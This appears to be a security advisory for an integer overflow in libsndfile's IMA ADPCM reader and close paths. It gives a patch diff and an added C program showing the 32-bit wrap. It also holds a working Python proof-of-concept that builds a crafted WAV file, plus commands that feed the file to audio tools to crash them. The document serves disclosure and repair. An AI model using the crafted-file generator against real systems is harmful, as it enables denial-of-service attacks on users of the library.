### Vulnerability overview

- **CVE ID**: CVE-2026-37555
- **Affected versions**: libsndfile ≤ 1.2.2 (the current release at the time of writing)
- **Vulnerability type**: CWE-190 (Integer Overflow or Wraparound)
- **CVSS v3.1 vector**: AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H (base score 5.5, Medium)
- **Reporter**: Feng Ning, Innora Security Research

### Impact

- Two 32-bit multiplications in `src/ima_adpcm.c` can overflow. Both operands are `int`, so the product is computed in 32 bits before it is stored into the 64-bit `psf->sf.frames`; a crafted WAV or W64 file can therefore wrap `psf->sf.frames` to a negative value or to zero.
- The AIFF code path received an explicit `sf_count_t` cast as part of the fix for CVE-2022-33065, but the WAV reader path and the write-side close path were left unhandled.
- A crafted WAV/W64 file whose `samplesperblock * blocks` product exceeds `INT_MAX` can lead to undersized buffer allocations or to iteration loops that read or write out of bounds, ending in an abnormal termination (DoS).

### Fix

- Apply to both affected sites the same `sf_count_t` cast that the AIFF path already uses. The cast must be applied to an operand (so that the multiplication itself is widened to 64 bits), not to the finished 32-bit product.
- The fix:

```c
// Line 235 — WAV/W64 path
- psf->sf.frames = pima->samplesperblock * pima->blocks ;
+ psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blocks ;

// Line 167 — ima_close write path
- psf->sf.frames = pima->samplesperblock * pima->blockcount / psf->sf.channels ;
+ psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blockcount / psf->sf.channels ;
```

### Proof of Concept (POC)

The generator below writes a `WAVE_FORMAT_IMA_ADPCM` (0x0011) file whose `wSamplesPerBlock` and block count multiply to 2,500,000,000, which does not fit in a signed 32-bit integer. Note that the data chunk must really be that long, so the output file is about 1.25 GB; it is zero-filled in pieces rather than built as one in-memory string.

```python
import struct

def make_wav_ima(samplesperblock, blocks, channels=1, samplerate=8000):
    """Return (header, data_size) for an IMA ADPCM WAV with crafted header values.

    samplesperblock * blocks must exceed 2**31 - 1 for the 32-bit
    multiplication in ima_reader_init to wrap.
    """
    # IMA ADPCM block size: ((samples - 1) / 2 + 4) bytes per channel
    blockalign = ((samplesperblock - 1) // 2 + 4) * channels
    avg_bytes_per_sec = samplerate * blockalign // samplesperblock
    fmt_body = struct.pack('<HHIIHHHH',
                           0x0011,            # wFormatTag: IMA ADPCM
                           channels,
                           samplerate,
                           avg_bytes_per_sec,
                           blockalign,        # nBlockAlign
                           4,                 # wBitsPerSample
                           2,                 # cbSize: one extra WORD follows
                           samplesperblock)   # wSamplesPerBlock (16-bit field)
    data_size = blockalign * blocks
    riff_size = 4 + (8 + len(fmt_body)) + (8 + data_size)
    header = (b'RIFF' + struct.pack('<I', riff_size) + b'WAVE'
              + b'fmt ' + struct.pack('<I', len(fmt_body)) + fmt_body
              + b'data' + struct.pack('<I', data_size))
    return header, data_size

header, data_size = make_wav_ima(50000, 50000)
with open('overflow.wav', 'wb') as f:
    f.write(header)
    zeros = b'\x00' * (1 << 20)          # zero-fill the data chunk 1 MiB at a time
    remaining = data_size
    while remaining:
        n = min(remaining, len(zeros))
        f.write(zeros[:n])
        remaining -= n
```

Feed the file to either consumer of `psf->sf.frames`:

```sh
sndfile-info overflow.wav
python3 -c "import soundfile; soundfile.info('overflow.wav')"
# triggers the integer overflow in ima_reader_init / ima_close
```
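To show numerically what the PoC's header values do to the two multiplications, here is an added C example written for this page; it is not libsndfile code and not part of the advisory. It models `sf_count_t` as `int64_t` (an assumption that matches what the cast in the fix relies on), computes the pre-fix 32-bit product with unsigned arithmetic so the wrap is reproducible without invoking undefined behaviour, and derives the block count from the data chunk length the way a reader would; `frames_from_header` and `ima_blocksize` are this example's own helpers, since the page does not show libsndfile's derivation.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example: sf_count_t modelled as a 64-bit signed integer (assumption). */
typedef int64_t sf_count_t;

/* IMA ADPCM block size for the WAV fmt chunk: ((samples - 1) / 2 + 4) bytes per channel. */
int ima_blocksize(int channels, int samplesperblock)
{
    return ((samplesperblock - 1) / 2 + 4) * channels;
}

/* Pre-fix behaviour: both operands are int, so the product is formed in 32 bits.
 * Signed overflow is undefined in C; the unsigned arithmetic here models the
 * two's-complement wrap that the compiled library exhibits in practice. */
int32_t frames_before_fix(int samplesperblock, int blocks)
{
    uint32_t wrapped = (uint32_t) samplesperblock * (uint32_t) blocks;
    return (int32_t) wrapped;   /* modular conversion on mainstream compilers */
}

/* Post-fix behaviour: casting the left operand widens the whole multiplication
 * to 64 bits. Casting the product instead, (sf_count_t)(a * b), would not help. */
sf_count_t frames_fixed(int samplesperblock, int blocks)
{
    return (sf_count_t) samplesperblock * blocks;
}

/* The write-side close path divides by the channel count after the same widening. */
sf_count_t frames_close_fixed(int samplesperblock, int blockcount, int channels)
{
    return (sf_count_t) samplesperblock * blockcount / channels;
}

/* Block count derived from the data chunk length, as a reader would do it
 * (assumption: the page does not show libsndfile's own derivation).
 * Returns -1 for an unusable header, including a block count that would not
 * fit the 32-bit block counter in the first place (relevant for 64-bit W64 sizes). */
sf_count_t frames_from_header(sf_count_t datalength, int channels, int samplesperblock)
{
    if (channels < 1 || samplesperblock < 1 || datalength < 0)
        return -1;
    int blocksize = ima_blocksize(channels, samplesperblock);
    sf_count_t blocks = datalength / blocksize;
    if (blocks > INT32_MAX)
        return -1;
    return frames_fixed(samplesperblock, (int) blocks);
}

int main(void)
{
    int spb = 50000, blocks = 50000;   /* the PoC's header values */
    sf_count_t datalength = (sf_count_t) ima_blocksize(1, spb) * blocks;

    printf("blocksize        : %d bytes\n", ima_blocksize(1, spb));
    printf("data chunk       : %lld bytes\n", (long long) datalength);
    printf("frames (pre-fix) : %d\n", frames_before_fix(spb, blocks));
    printf("frames (fixed)   : %lld\n", (long long) frames_fixed(spb, blocks));
    printf("from header      : %lld\n", (long long) frames_from_header(datalength, 1, spb));
    /* 32768 * 131072 == 2^32, so the 32-bit product wraps to exactly zero */
    printf("frames (pre-fix) : %d for 32768 x 131072\n", frames_before_fix(32768, 131072));
    return 0;
}
```

The 50000 x 50000 case yields the negative frame count the advisory describes; the 32768 x 131072 case (a 16-bit `wSamplesPerBlock` of 32768 and a 2.15 GB data chunk) is the zero case, which the widened multiplication also removes.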